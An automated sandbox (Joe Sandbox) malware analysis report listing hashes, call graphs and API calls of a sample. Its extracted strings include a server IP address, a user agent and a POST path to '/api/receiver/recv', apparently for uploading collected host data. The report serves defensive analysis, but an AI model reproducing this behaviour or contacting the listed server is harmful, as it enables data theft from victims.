                                                  • Instruction ID: 8f947ca3e70f6b8feaee418d270958694091f3706a85f1facc3982839d6b2dd6
                                                  • Opcode Fuzzy Hash: 820f71779dba7504c17d83317e46ce1ff9ea86ab828da20d84f32d531c08ff59
                                                  • Instruction Fuzzy Hash: 8BF0F6728093848ED712DFA884243CCFFF0AF56314F19849BD185E7262C3BD4849CB62
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c0bfd1cef8966f45b5058716be74544cfd29a42e50dc6abb7d99443a90f4cdbb
                                                  • Instruction ID: 7470611d0e9511c14174ef65ab909cfdbd4616d9d27d46c4d56a25d36668dfe3
                                                  • Opcode Fuzzy Hash: c0bfd1cef8966f45b5058716be74544cfd29a42e50dc6abb7d99443a90f4cdbb
                                                  • Instruction Fuzzy Hash: 18F082307017108FD728DF29C494666B7EAAF46610B19C07EE98E8B330EA76EC45C782
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c2a96a0fda57cb346761b2c971520ce974aa18666f09e01b9b05f6cb8bb39d01
                                                  • Instruction ID: f834e2f1e8e84dcc4dbdf0b91daa5c665139a7be02440a015fed6f0ebb80ea1d
                                                  • Opcode Fuzzy Hash: c2a96a0fda57cb346761b2c971520ce974aa18666f09e01b9b05f6cb8bb39d01
                                                  • Instruction Fuzzy Hash: 18E065357046185F4B1CFB5DA82496E77EEDFC8A20321405AE509C73A4DE35DD028B95
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: de8917f07ddcea310a060498d20c4c66faed447d41e09810e6f6850ee23433ab
                                                  • Instruction ID: 99df72d8b60f86aea9877ffa95d625833bd3ee10e14e351659884cc177998cca
                                                  • Opcode Fuzzy Hash: de8917f07ddcea310a060498d20c4c66faed447d41e09810e6f6850ee23433ab
                                                  • Instruction Fuzzy Hash: 16F01735614115EFDB009F68E4697B8B3F8FB48367F5040A5E24AD72A0C77889DACB21
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fc0469f3c8f89e69d3f789d04807b72c758055c89d67bef2c547f05f09a1b25f
                                                  • Instruction ID: c256818a1f2aa4609e860786e9904138b9a942e1a72f31671f108926bac551b0
                                                  • Opcode Fuzzy Hash: fc0469f3c8f89e69d3f789d04807b72c758055c89d67bef2c547f05f09a1b25f
                                                  • Instruction Fuzzy Hash: 65F030723083412FC301977D9894A15BFB5EFC632471542BAD248CB3B6DAA1CD0587D0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 47950acd8d80cad1944ebd162752a3c1d2f898cb66dbfdce34d59bcd8d2777d9
                                                  • Instruction ID: 3e07e4aa7ef1942dcc122ef769b191e4b88b208e8a0b915ce74a9649629cfeb3
                                                  • Opcode Fuzzy Hash: 47950acd8d80cad1944ebd162752a3c1d2f898cb66dbfdce34d59bcd8d2777d9
                                                  • Instruction Fuzzy Hash: 34E0D8363453500FC7145ABC58A17BB3FBA4BD9320715806BD506CF382CC568C0293A1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 52c69dc25f4910e84801cbe420aeca1b2b91704aedf61a0faec048806a82580f
                                                  • Instruction ID: 7be1e84cc97ea02330f2af139434f1a385750d78cd914d199c78e6629eb75202
                                                  • Opcode Fuzzy Hash: 52c69dc25f4910e84801cbe420aeca1b2b91704aedf61a0faec048806a82580f
                                                  • Instruction Fuzzy Hash: 60E030756007145B86309F2A985452FFBE9EBD17207008A1AE68687780D671AD09CBE5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 53a4cb697ac5e948ca9f8915ebad9c195698bee731ceaa8c50527db96c16f428
                                                  • Instruction ID: 2445b1ff0a1e017b4be713232afb34bcd1777984449316d7040ae787b029d9ed
                                                  • Opcode Fuzzy Hash: 53a4cb697ac5e948ca9f8915ebad9c195698bee731ceaa8c50527db96c16f428
                                                  • Instruction Fuzzy Hash: 56F0E53870461C4F8F0CEB2CA82066C77EB9BC8620320415AE61AC73F4DE308D038B85
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2254ffa27d3f6ced5195176b00f7191c98b100f7a4fbf060358c67d267fc1c8f
                                                  • Instruction ID: 64f6bca50f5ad7fa8a6aceb305409a37b88f4f09d86aad64ebf8543b8cb46855
                                                  • Opcode Fuzzy Hash: 2254ffa27d3f6ced5195176b00f7191c98b100f7a4fbf060358c67d267fc1c8f
                                                  • Instruction Fuzzy Hash: 23F06D715442868FCB62CB68C8456A87FB2AB02315F5841F5E094DB2A2DA3C9A46DB81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1701a5cbfd95b7251d64070f76a45d66921c21c8c0b3cf2e96555b7b7eaf3eef
                                                  • Instruction ID: 7e6adf1c0f72312ac44534574c0fd755fa6c9310b33fd64a5ec30cce9f356e8d
                                                  • Opcode Fuzzy Hash: 1701a5cbfd95b7251d64070f76a45d66921c21c8c0b3cf2e96555b7b7eaf3eef
                                                  • Instruction Fuzzy Hash: 51E04F72B04218AF9714DAEE8C516AFFAEECBC4690F10C07A9508D3208F9319D4183E0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ab9667396a62f5ec7388eac8ad916d32927dae2263cf5ad9d22d4e997f3e3306
                                                  • Instruction ID: cf5f993269e135e9980c91e7c91bed6bb5983720665d84b78c6b7b18c55f6388
                                                  • Opcode Fuzzy Hash: ab9667396a62f5ec7388eac8ad916d32927dae2263cf5ad9d22d4e997f3e3306
                                                  • Instruction Fuzzy Hash: CBE0E5363604148FC714DB2ED848D65B7EDEF89A2131640BAF209CB372DA61EC02CB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f88cd799d1dff3b5c44e6a3684bbec57ad3b6b142505c28e209eab338f3d31e3
                                                  • Instruction ID: 3e762122f0e99042033a10c713530430b091a75dcba0b94551c2b527b0f59cf0
                                                  • Opcode Fuzzy Hash: f88cd799d1dff3b5c44e6a3684bbec57ad3b6b142505c28e209eab338f3d31e3
                                                  • Instruction Fuzzy Hash: 9FF030393541818FC715DF2DD8549647BEAAF8A62531A40FAE249CB373DA65DC03CB00
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5385b5d53434f8b1c8e09b8632adc5c2f6f75545fb8799282e8b8ee7ff8be67c
                                                  • Instruction ID: 64478376613de0637cc90d4aac62aa44382b95e20e97141ea77699cc8f503f34
                                                  • Opcode Fuzzy Hash: 5385b5d53434f8b1c8e09b8632adc5c2f6f75545fb8799282e8b8ee7ff8be67c
                                                  • Instruction Fuzzy Hash: 18E04F75300510AF4704EA5A989892AFBDEFFC96643A544B9E60DC7355DE21DC024790
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 08aff93ebc00f3bc898e18d76c62943a4b2705b9653cb778ba6c296d767c2c44
                                                  • Instruction ID: 57365cffb70f71b469559bdd69d75c2fe3fae5ffb58d0a86513c464eb3069872
                                                  • Opcode Fuzzy Hash: 08aff93ebc00f3bc898e18d76c62943a4b2705b9653cb778ba6c296d767c2c44
                                                  • Instruction Fuzzy Hash: FAC08C32000208BBCB027E81CC00E5ABF2ABB44390F10C004F7080D061D3B3D523EBC0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cc52ac3639a97314ee297d08111bbe1ece30a28e1fa1582acf904ac83a81c78e
                                                  • Instruction ID: bc08c7ed2517b2eb5f60bb13c16204f855fce7a81c6ed118fe4d2913983a731c
                                                  • Opcode Fuzzy Hash: cc52ac3639a97314ee297d08111bbe1ece30a28e1fa1582acf904ac83a81c78e
                                                  • Instruction Fuzzy Hash: 7BD012301043464BCB2A57368C11345BF317F42104B5845FDC1894EA93C77FC4C6CB85
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fdb7c5fceb54c1cd3ae833542ce158b792e1862dde1c43a81aba0a5468ca7a9f
                                                  • Instruction ID: 17a2e3eaac22e293f5e93466c658325a328e100e8872a203a847bf3d3a52f722
                                                  • Opcode Fuzzy Hash: fdb7c5fceb54c1cd3ae833542ce158b792e1862dde1c43a81aba0a5468ca7a9f
                                                  • Instruction Fuzzy Hash: F9B092B26020186D6198A1FD6521BE967049BC416133198BBC10DDA352C5610596C295
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 91da765e8c9d6b4de3cb2826a2841883dbebfffb8149f70a4dccb7bd4583f9c5
                                                  • Instruction ID: d75a58238c7f511b5f3e12cc4fddbdbdfe13a6275e0ad9962c51d559d6ce289f
                                                  • Opcode Fuzzy Hash: 91da765e8c9d6b4de3cb2826a2841883dbebfffb8149f70a4dccb7bd4583f9c5
                                                  • Instruction Fuzzy Hash: C2C09B37109204AE8641E754C9A4D2FFAE5FFB7300B40EC92A34547031DA33C95DE712
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eeaef9b10b7c6825025ac295034d11ac1781c793f56ddca9640d466430bb11f3
                                                  • Instruction ID: d77331d01c494b34a0a1ba301ee13a1f87b48ddd987b2ac5f525b7548dd93187
                                                  • Opcode Fuzzy Hash: eeaef9b10b7c6825025ac295034d11ac1781c793f56ddca9640d466430bb11f3
                                                  • Instruction Fuzzy Hash: F2C092351845098FC310AB68D84CFA077EAEF45605F0980F0E10C8BB33DA22F8408B44
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eeaef9b10b7c6825025ac295034d11ac1781c793f56ddca9640d466430bb11f3
                                                  • Instruction ID: d77331d01c494b34a0a1ba301ee13a1f87b48ddd987b2ac5f525b7548dd93187
                                                  • Opcode Fuzzy Hash: eeaef9b10b7c6825025ac295034d11ac1781c793f56ddca9640d466430bb11f3
                                                  • Instruction Fuzzy Hash: F2C092351845098FC310AB68D84CFA077EAEF45605F0980F0E10C8BB33DA22F8408B44
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e181fecefc109fefdcbd0b026ec8ceb3c3019faaa6a304f8c7faab048bc27f8e
                                                  • Instruction ID: 49bfd88f15d2ad378ac4c52fa4bd87f697f18fbf5c58269ab125fb97bd15b3a1
                                                  • Opcode Fuzzy Hash: e181fecefc109fefdcbd0b026ec8ceb3c3019faaa6a304f8c7faab048bc27f8e
                                                  • Instruction Fuzzy Hash:

                                                  Execution Graph

                                                  Execution Coverage:11.6%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:12.9%
                                                  Total number of Nodes:381
                                                  Total number of Limit Nodes:17
2889->2887 2890->2883 2892 2336ee 2891->2892 2893 238b90 GetCurrentHwProfileA 2892->2893 2894 233702 2893->2894 2910 2338c0 2894->2910 2897 2337b4 2928 2334a0 2897->2928 2898 2337fa 2899 2337ef 2898->2899 2943 231ea0 RtlAllocateHeap 2898->2943 2902 231ee0 RtlFreeHeap 2899->2902 2903 23379b 2902->2903 2903->2883 2904 233820 2904->2899 2905 232b10 3 API calls 2904->2905 2905->2899 2907 2390c8 2906->2907 2909 2390e0 2907->2909 2958 232200 2907->2958 2909->2889 2911 2338f8 2910->2911 2927 233791 2910->2927 2911->2927 2944 238f20 2911->2944 2914 233953 2953 231ea0 RtlAllocateHeap 2914->2953 2915 233940 2917 231ee0 RtlFreeHeap 2915->2917 2917->2927 2918 233965 2919 237d10 RtlAllocateHeap 2918->2919 2922 233972 2919->2922 2920 2339a0 2921 2339de 2920->2921 2923 2339ae 2920->2923 2924 231ee0 RtlFreeHeap 2921->2924 2922->2920 2925 2380d0 RtlFreeHeap 2922->2925 2926 231ee0 RtlFreeHeap 2923->2926 2924->2927 2925->2920 2926->2927 2927->2897 2927->2898 2927->2903 2929 2334ba 2928->2929 2930 233548 2928->2930 2955 231ea0 RtlAllocateHeap 2929->2955 2956 231ec0 RtlSizeHeap 2930->2956 2933 2334cc 2933->2899 2934 2335a1 2937 2335bf 2934->2937 2938 232b10 3 API calls 2934->2938 2935 233573 2935->2934 2936 233614 2935->2936 2957 231ec0 RtlSizeHeap 2936->2957 2939 2334a0 5 API calls 2937->2939 2938->2937 2939->2933 2941 233622 2941->2933 2942 232060 2 API calls 2941->2942 2942->2933 2943->2904 2945 232360 2 API calls 2944->2945 2947 238f4c 2945->2947 2946 233934 2946->2914 2946->2915 2947->2946 2948 239098 CloseHandle 2947->2948 2954 231ea0 RtlAllocateHeap 2947->2954 2948->2946 2950 23902d 2950->2948 2951 239082 2950->2951 2952 231ee0 RtlFreeHeap 2950->2952 2951->2948 2952->2951 2953->2918 2954->2950 2955->2933 2956->2935 2957->2941 2959 23220f 2958->2959 2962 231ea0 RtlAllocateHeap 2959->2962 2961 232223 2961->2909 2962->2961 2963 231897 2965 231845 2963->2965 2964 2318e8 2966 2318a2 GlobalHandle 2965->2966 2968 23188c 2965->2968 2966->2965 2967 2319f7 LoadLibraryA GetProcAddress 
2967->2964 2968->2964 2968->2967 2969 23177a 2971 23174c 2969->2971 2970 2317e0 3 API calls 2970->2971 2971->2970 2972 2317b5 2971->2972

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00231EA0: RtlAllocateHeap.NTDLL(031B0000,00000008,00233D82), ref: 00231EB0
                                                  • NtQuerySystemInformation.NTDLL(00000010,?,00001000,00000000), ref: 002314A9
                                                  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 00231523
                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0023154B
                                                  • DuplicateHandle.KERNELBASE(000000FF,?,00000000), ref: 00231565
                                                  • GetFileType.KERNELBASE(000000FF), ref: 0023157F
                                                  • CloseHandle.KERNEL32(000000FF), ref: 0023159E
                                                  • GetCurrentProcess.KERNEL32(000000FF,00000000,00000000,00000001), ref: 002315AE
                                                  • DuplicateHandle.KERNEL32(000000FF,?,00000000), ref: 002315C8
                                                  • CloseHandle.KERNEL32(000000FF), ref: 002315DC
                                                  • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 002315EF
                                                    • Part of subcall function 00231EE0: RtlFreeHeap.NTDLL(031B0000,00000000,00000000,01430000), ref: 00231EFE
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: Handle$CloseProcess$CurrentDuplicateHeap$AllocateChangeFileFindFreeInformationNotificationOpenQuerySystemType
                                                  • String ID:
                                                  • API String ID: 2769610337-0
                                                  • Opcode ID: 64d74ca101909f20c73012933e87197aaffcca6bedb27d4fecd7adac127e3a0f
                                                  • Instruction ID: 58c275442e21346fd428e2081c5fd6107c0b4ee4a949310568ebeb0b31b36d24
                                                  • Opcode Fuzzy Hash: 64d74ca101909f20c73012933e87197aaffcca6bedb27d4fecd7adac127e3a0f
                                                  • Instruction Fuzzy Hash: 985152F4D10209EFDB14CFD8D989BAEB7B5FB48705F108258E612A7280D7749A61CF61

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 75 2317e0-231843 76 231845-23184b 75->76 77 23184e-231857 75->77 76->77 78 2318e2-2318e6 77->78 79 23185d-23188a call 232130 call 2390f0 77->79 80 2318e8-2318ea 78->80 81 2318ef-231916 78->81 91 231899-2318a0 79->91 92 23188c-231895 79->92 83 231a19-231a1c 80->83 84 231a16 81->84 85 23191c-231925 81->85 84->83 85->84 88 23192b-231931 85->88 90 231938-231944 88->90 93 231960-2319c9 90->93 94 231946-23195e 90->94 95 2318a2-2318c8 GlobalHandle 91->95 96 2318cb-2318dd 91->96 92->78 97 2319f7-231a12 LoadLibraryA GetProcAddress 93->97 98 2319cb-2319dc 93->98 94->90 95->96 96->76 97->83 99 2319f1-2319f4 98->99 100 2319de-2319ef 98->100 99->97 100->98
                                                  APIs
                                                  • GlobalHandle.KERNEL32(00000000), ref: 002318C8
                                                  Strings
                                                  Similarity
                                                  • API ID: GlobalHandle
                                                  • String ID: l
                                                  • API String ID: 1075865800-2517025534
                                                  • Opcode ID: b6c2c820086e090a6e65cbef9173a8a310996b1ba61824610d16e5691f4cb336
                                                  • Instruction ID: 59ebe0fc6cc7e086a88859cf44bc6f04bda2106d8a6429e5fea2d0cd20df25a2
                                                  • Opcode Fuzzy Hash: b6c2c820086e090a6e65cbef9173a8a310996b1ba61824610d16e5691f4cb336
                                                  • Instruction Fuzzy Hash: 9E91C5B4E15209DFCF08CF98D590AADBBB2FF48308F248199D915AB345D730AA61DF94

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 172 238ca0-238cbf GetSystemInfo
                                                  APIs
                                                  • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,00233271,G1#), ref: 00238CAA
                                                  Strings
                                                  Similarity
                                                  • API ID: InfoSystem
                                                  • String ID: q2#
                                                  • API String ID: 31276548-3848666742
                                                  • Opcode ID: c119e4caff3985fc27665ebf9d77a2166ff78020601de8af9d0b8d0780eff462
                                                  • Instruction ID: 5173f3ce8cfea19f0f04eed0bea2921325d05dd800785ee200cd59b6c47fdbe6
                                                  • Opcode Fuzzy Hash: c119e4caff3985fc27665ebf9d77a2166ff78020601de8af9d0b8d0780eff462
                                                  • Instruction Fuzzy Hash: 34D0A97490420C8BCB04DF90D84889AB7FDAB48200F0081B4DC8847300EA32E9128BD1
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 5f1edb4a8a433ba8af8245a742742a02f8e3ea1f166909dc890058782719e31e
                                                  • Instruction ID: fc4c8b264cb6b19f2aa427bad1b95a639ce99786f4186407e3dcba6de960d28a
                                                  • Opcode Fuzzy Hash: 5f1edb4a8a433ba8af8245a742742a02f8e3ea1f166909dc890058782719e31e
                                                  • Instruction Fuzzy Hash: 164102B0B04205DBDB04CFA4D851B69B7B6DB84300F2081A8E6454F7D9D776DF62DB50

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 29 232810-232855 31 232857 29->31 32 23285c-2328c1 29->32 33 23291a 31->33 39 2328c3 32->39 40 2328c5-2328e7 CreateThread 32->40 34 23291c-23291f 33->34 39->33 41 2328eb-23290f CreateThread 40->41 42 2328e9 40->42 43 232913-232918 41->43 44 232911 41->44 42->33 43->34 44->33
                                                  Strings
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0u$0u0u$0u0u$45.125.66.18$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.4$`
                                                  • API String ID: 0-2265949662
                                                  • Opcode ID: 917edf8db4694d881001c7256f2cc7d309b7694be9234db1dbacebc08bbda815
                                                  • Instruction ID: c4b7f8b519bdd91a94a33ac4c844771340ba03a9a1e8d8dbc671e0299467c61b
                                                  • Opcode Fuzzy Hash: 917edf8db4694d881001c7256f2cc7d309b7694be9234db1dbacebc08bbda815
                                                  • Instruction Fuzzy Hash: 713106B4650308EFE710CF50DC8AFA97B65AB08701F20C144FA499F2D0C3B5AA8ACB95

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateMutexA.KERNELBASE(00000000,00000000,082e2202-17f7-4654-a651-ac9a3778e1d7), ref: 00231D43
                                                  • GetLastError.KERNEL32 ref: 00231D52
                                                  • Sleep.KERNELBASE(00001388), ref: 00231E1C
                                                  • CloseHandle.KERNEL32(00000000), ref: 00231E3A
                                                  • ExitProcess.KERNEL32 ref: 00231E42
                                                  Strings
                                                  • 082e2202-17f7-4654-a651-ac9a3778e1d7, xrefs: 00231D3A
                                                  Similarity
                                                  • API ID: CloseCreateErrorExitHandleLastMutexProcessSleep
                                                  • String ID: 082e2202-17f7-4654-a651-ac9a3778e1d7
                                                  • API String ID: 168847217-1460249064
                                                  • Opcode ID: 523dacda9255a23dddba1526a4b9bf07b4661f89823b777232fb0227ac5d1625
                                                  • Instruction ID: e8ab7629b6b285ea8f589291f3a0b5d5c3383a0c9581102bca0a0609e3200139
                                                  • Opcode Fuzzy Hash: 523dacda9255a23dddba1526a4b9bf07b4661f89823b777232fb0227ac5d1625
                                                  • Instruction Fuzzy Hash: B931E2F0D202199BDB28EFA4E84ABEE7775AB14300F100076E805B2181DB759A75DFA2

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 101 232e60-232e66 102 232e6d-232e74 101->102 103 232e7a-232e80 102->103 104 2330af-2330b2 102->104 105 232e8e-232e97 103->105 106 23309f-2330aa Sleep 105->106 107 232e9d-232ea9 105->107 106->102 108 23309a 107->108 109 232eaf-232ebe 107->109 108->106 110 232ec0-232ecf 109->110 111 232ed5-232ef8 call 2391d0 109->111 110->108 110->111 114 232f10-232f2c 111->114 115 232efa-232f0b call 232920 111->115 117 232fc3-232ff0 call 231ea0 114->117 118 232f32-232f6e 114->118 120 232e82-232e8a 115->120 127 232ff2-232ffd 117->127 128 233009-233061 117->128 123 232f70-232f82 118->123 124 232f87-232faa 118->124 120->105 123->120 124->117 130 232fac-232fb7 124->130 127->128 131 233068-23306f 128->131 130->117 132 233071-23307c 131->132 133 233088-233093 131->133 132->133 133->108
                                                  APIs
                                                  • Sleep.KERNELBASE(000003E8), ref: 002330A4
                                                    • Part of subcall function 00231EA0: RtlAllocateHeap.NTDLL(031B0000,00000008,00233D82), ref: 00231EB0
                                                  Strings
                                                  Similarity
                                                  • API ID: AllocateHeapSleep
                                                  • String ID: /api/receiver/recv$Content-Type: application/octet-stream$POST
                                                  • API String ID: 4201116106-1595302217
                                                  • Opcode ID: e5dc4291eda71ea1872e02d03fc7b1593f456cad97b9189cb332bdeaf25693a7
                                                  • Instruction ID: d1fcc37bf905aa18eb62fe0ab4f22badb6833119242ab394a125ce99aa86200b
                                                  • Opcode Fuzzy Hash: e5dc4291eda71ea1872e02d03fc7b1593f456cad97b9189cb332bdeaf25693a7
                                                  • Instruction Fuzzy Hash: E97145B8A10219EBCB14CF84D584AB9BBB1FF48714F208198F9865B381D775EE91DB90

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 134 238cc0-238cd2 GetPhysicallyInstalledSystemMemory 135 238cf2-238cf5 134->135 136 238cd4-238ceb call 239260 134->136 136->135
                                                  APIs
